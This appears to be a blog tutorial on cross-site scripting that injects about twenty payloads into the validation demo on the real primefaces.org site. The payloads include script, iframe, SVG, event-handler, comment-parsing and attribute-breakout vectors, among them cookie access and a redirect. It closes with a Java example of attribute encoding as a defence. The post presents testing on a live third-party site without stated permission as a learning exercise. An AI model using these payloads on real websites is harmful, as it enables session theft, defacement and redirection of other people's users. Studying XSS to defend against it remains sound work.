
Hello everyone! Sometimes even professionals forget how to do a simple configuration, and we will take advantage of that to learn some Java hacking with a technique named XSS in a real JSF environment.


Hacking primefaces

Primefaces.org is the site for the JSF library PrimeFaces, which is not only very popular but also visually very attractive. I was navigating the site in my quest for validation hints and realized the validation demo was vulnerable, and decided to use it to learn, in a real environment, the hacking technique called cross-site scripting, or XSS.

The power of this type of attack is that once the data gets saved, the code we introduced runs every time that data is consulted. Let's go to the examples.

"><script>alert("javapro.org")</script>

With this vector we can, for example, obtain the cookies that the site handles

"><script>alert (document.cookie)</script>


We can also execute JavaScript from within an iframe

"><IFRAME SRC="javascript:alert('javapro.org');"></IFRAME>

Or simply show an iframe

"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://javapro.org/"></iframe>

We can also execute some code from an HTML5 video object

"><video><source onerror="alert('javapro.org')">

We can also generate a button and make the code we wish run when it is clicked

"><form><button style="height:200px;width:800px;" formaction="javascript:alert('javapro.org')">Click!</button>

In the same way we can also use a math object

"><math href="javascript:alert('javapro.org')">CLICKME</math>

Math objects can also have some other executable objects inside

"><math><maction actiontype="statusline" xlink:href="javascript:alert('javapro.org')">CLICKME<mtext>HCKD</mtext></maction> </math>

Links are also useful; we can, for example, use javascript as part of the URL

"><a href="javascript:alert('javascriptpro.org')">click me!</a>

Or from an embedded SVG image that executes a script

"><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoImphdmFwcm8ub3JnIik7PC9zY3JpcHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

The last script produces exactly the same results as the preceding one


Using AJAX validation, we can get the code to execute as you type by using the event attribute of the script tag

"><SCRIPT FOR=document EVENT=onreadystatechange>alert('javapro.org')</SCRIPT>

In a similar way we can even modify the current label so that our code is executed when the mouse passes over it

" onmouseover="alert('javapro.org')" >

Moreover, we don't even need angle brackets

" onmouseover="alert;throw 1;"

We can also show a new page

" onmouseenter="document.open();document.write('<html><body><p>JavaPro.org</p></body></html>');document.close();" >

We can produce a message followed by an error

" onmouseenter="document.location=alert('javapro.org')//" >

Or a redirect call, for example

" onmouseenter="document.location='http://www.javapro.org'"

HTML comments are harmless, aren't they? NO!

<!--<img src="--><img src=x onerror=alert('javapro.org')//"-->

Taking advantage of a parsing bug.

<![><img src="]><img src=x onerror=alert('javapro.org')//">

We can also obfuscate a bit and take advantage of parser errors

"><style><img src="</style><img src=x onerror=alert('javapro.org')//">
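
On the defensive side, most of the vectors above begin by closing a double-quoted attribute, and the bracket-less ones show why escaping only < and > is not enough. The Java sketch below is an added example, not code from PrimeFaces or from the original post; it assumes the value is echoed into a double-quoted attribute such as <input value="...">, and the class and method names are hypothetical. It compares tags-only escaping with full attribute encoding on vectors copied from this page.

```java
import java.util.List;

public class AttributeEncodingDemo {

    // Weak: neutralises tags but leaves quote characters untouched.
    static String escapeTagsOnly(String s) {
        return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;");
    }

    // Hardened: also encodes both quote characters, so the value cannot
    // terminate the attribute it is rendered into.
    static String encodeForHtmlAttribute(String s) {
        return escapeTagsOnly(s).replace("\"", "&quot;").replace("'", "&#39;");
    }

    // True if the encoded text still holds a character that ends a
    // double-quoted attribute or opens/closes a tag.
    static boolean canLeaveAttribute(String encoded) {
        return encoded.contains("\"") || encoded.contains("<") || encoded.contains(">");
    }

    public static void main(String[] args) {
        // Vectors copied from this page; here they are only handled as strings.
        List<String> vectors = List.of(
            "\"><script>alert(\"javapro.org\")</script>",
            "\" onmouseover=\"alert('javapro.org')\" >",
            "\" onmouseover=\"alert;throw 1;\"",
            "\" onmouseenter=\"document.location='http://www.javapro.org'\"",
            "<!--<img src=\"--><img src=x onerror=alert('javapro.org')//\"-->",
            "\"><style><img src=\"</style><img src=x onerror=alert('javapro.org')//\">");

        for (String v : vectors) {
            String weak = escapeTagsOnly(v);
            String strong = encodeForHtmlAttribute(v);
            // <input value="..."> is an assumed sink, not the demo's real markup.
            System.out.printf("tags-only breakout=%b, attribute-encoded breakout=%b%n",
                    canLeaveAttribute(weak), canLeaveAttribute(strong));
            System.out.println("  <input value=\"" + strong + "\">");
            if (canLeaveAttribute(strong)) {
                throw new IllegalStateException("encoder let a breakout character through");
            }
        }
    }
}
```

Every vector still breaks out after tags-only escaping because the leading double quote survives; with attribute encoding each one is rendered as inert text inside the value.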
